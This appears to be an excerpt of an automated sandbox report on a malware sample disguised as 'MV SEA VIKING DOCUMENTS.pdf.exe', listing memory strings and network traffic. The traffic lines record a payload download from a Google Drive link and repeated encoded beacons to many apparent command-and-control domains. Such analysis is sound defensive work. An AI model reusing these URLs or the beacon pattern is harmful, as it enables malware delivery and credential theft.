      Source: explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?5
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?A
      Source: explorer.exe, 00000010.00000000.2567487509.0000000009B17000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2508765323.0000000009B17000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2696664365.0000000009B17000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2457275008.0000000009B17000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com~
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drString found in binary or memory: https://d.symcb.com/rpa0.
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4809179643.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819975217.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819478244.0000000001A44000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4806866586.0000000001A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-08-docs.googleusercontent.com/
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-08-docs.googleusercontent.com/2
      Source: shmhprg0nvltzt.exe, 00000023.00000003.4809179643.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819975217.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4806866586.0000000001A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-08-docs.googleusercontent.com/F$g
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2432523941.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766276229.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2724756121.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-08-docs.googleusercontent.com/bA
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4819883772.0000000001A8E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820024360.0000000001AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvob9bt0
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3j65rcq
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-08-docs.googleusercontent.com/x
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-04-08-docs.googleusercontent.com/ye
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765294903.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2725523941.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4811980051.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4810200786.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819570976.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: shmhprg0nvltzt.exe, 00000023.00000003.4811980051.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4810200786.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819570976.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/#
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765294903.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2725523941.0000000001A53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/q-
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4819224699.0000000001A28000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4818912953.00000000019E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765511086.0000000001A68000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2725748883.0000000001A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED=:
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765005931.0000000001A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwEDx&
      Source: explorer.exe, 00000010.00000000.2576182056.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2517426935.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2465323717.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2706242156.000000000D498000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comK
      Source: explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comt
      Source: firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
      Source: explorer.exe, 00000010.00000000.2452490678.00000000056F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2504423334.00000000056F5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
      Source: explorer.exe, 00000010.00000000.2452490678.00000000056F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2504423334.00000000056F5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenantbqs
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: DB1.31.drString found in binary or memory: https://login.live.com/
      Source: chkdsk.exe, 00000015.00000003.4843995961.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7207011041.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001F.00000002.4565305097.000000000366A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001F.00000003.4563237671.000000000307E000.00000004.00000020.00020000.00000000.sdmp, DB1.31.drString found in binary or memory: https://login.live.com//
      Source: cmd.exe, 0000001F.00000002.4565305097.000000000366A000.00000004.00000800.00020000.00000000.sdmp, DB1.31.drString found in binary or memory: https://login.live.com/https://login.live.com/
      Source: chkdsk.exe, 00000015.00000003.4843995961.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7207011041.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001F.00000002.4565305097.000000000366A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001F.00000003.4563237671.000000000307E000.00000004.00000020.00020000.00000000.sdmp, DB1.31.drString found in binary or memory: https://login.live.com/v104
      Source: explorer.exe, 00000010.00000000.2576182056.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2517426935.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2465323717.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2706242156.000000000D498000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com#
      Source: explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comeHost_
      Source: explorer.exe, 00000010.00000000.2466445411.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2707742528.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2577458976.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2518578539.000000000D574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
      Source: firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=
      Source: firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell
      Source: explorer.exe, 00000010.00000000.2530505129.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2476388852.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2723471084.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2590547531.000000000F7E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
      Source: explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comewe
      Source: explorer.exe, 00000010.00000000.2447368791.000000000367B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2507026504.00000000099B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2695034892.00000000099B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2455559582.00000000099B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2565914041.00000000099B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: chkdsk.exe, 00000015.00000002.7218059463.0000000005AC2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.vaughnediting.com/be4o/?Olnhrn=ongdD4qXjjPP&h48Hl=o5nWsVahRRcZ5g7lskYZzD6T98nAnbLK/jyfa2
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3j65rcqup1mp604v6fhecb8kek8r9nu/1645458600000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-08-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvob9bt0aenrms2uk1g1u44qsq7kk1jh/1645458825000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-08-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=zyUBHNqGnW7VnxSitCDb9MggHqAMtGNnwmK4vVI2BlMgKT8HiANJi7OUdKuilZWbd1L3&GXqXh=YZ_XN0 HTTP/1.1Host: www.neonewway.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=2H0l+vSkOseleOGxaYuOAM6EcVRszlgpd1g39MbiOsu7jwlookSoZaEGSOy4tzpz9QV3&GXqXh=YZ_XN0 HTTP/1.1Host: www.7bkj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0 HTTP/1.1Host: www.waktuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&GXqXh=YZ_XN0 HTTP/1.1Host: www.quanqiu55555.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&GXqXh=YZ_XN0 HTTP/1.1Host: www.mariachinuevozacatecas24-7.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=hkcde7P37oUuH8w5ioFv7OuFbHOx9d6tBZcdZbqEWA6Yt+e+JSjrlFDcUKkYXgm22imD&GXqXh=YZ_XN0 HTTP/1.1Host: www.antoniopasciuti.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1Host: www.dreamintelligent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1Host: www.rsxrsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1Host: www.noireimpactcollective.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=iu9SHmJYjlqHSITYxUYF5zd8ZPof8OreVpr1w+DDUlIuWCBWIgIZulFzL5qHxGUDcYYs&w6=ZbFDmL HTTP/1.1Host: www.4huav946.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&w6=ZbFDmL HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=a9faHC2D7Dm/r4BU9fdxzX5Q1U3tWnFtWGXmSrkj2WSz2Xwsoc22xGDcB1dwRLNeK4a1&w6=ZbFDmL HTTP/1.1Host: www.itservon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=i0+Fnnt4E2duUPt43OZuwY3vuaej64lfKZi0K7F4B5AoqOaU2cNQP6t/zkb03XoiZyP6&w6=ZbFDmL HTTP/1.1Host: www.fairytalepageants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1Host: www.buresdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=7cKzimu7mUkgDRyMKljMoWyo6u+mjltrVmMX1NSvq0diecWuw4+QXmAspWvQrjbM5ify&w6=ZbFDmL HTTP/1.1Host: www.vendasdigitaisonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&w6=ZbFDmL HTTP/1.1Host: www.quanqiu55555.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1Host: www.dreamintelligent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1Host: www.rsxrsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1Host: www.noireimpactcollective.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&7nx8=7nN0Wh-H7 HTTP/1.1Host: www.mariachinuevozacatecas24-7.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=kw7dGhb5eKkyCVvAuZmYTQsgnBkQwasXlJHrp3Yi63/vNGhbWFnPnmRrKjdxIJy9M/yz&7nx8=7nN0Wh-H7 HTTP/1.1Host: www.nagradi7.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu HTTP/1.1Host: www.waktuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1Host: www.buresdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?7nx8=7nN0Wh-H7&h48Hl=mz0ZGmPpQcHdBZrVbfezv7ox+MCQwaRA1qHDhj9nMfECw2TGe1c3Y7+z1tjTr42phwlz HTTP/1.1Host: www.eaglesaviationexperience.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=qw7hUB7wiBY63PZfQs3gDL1/RbwQ/gEcLPIEvk4CQbmdP+9FY8/qx5kKOZH67IcfD5ki&7nx8=7nN0Wh-H7 HTTP/1.1Host: www.easypeasy.communityConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
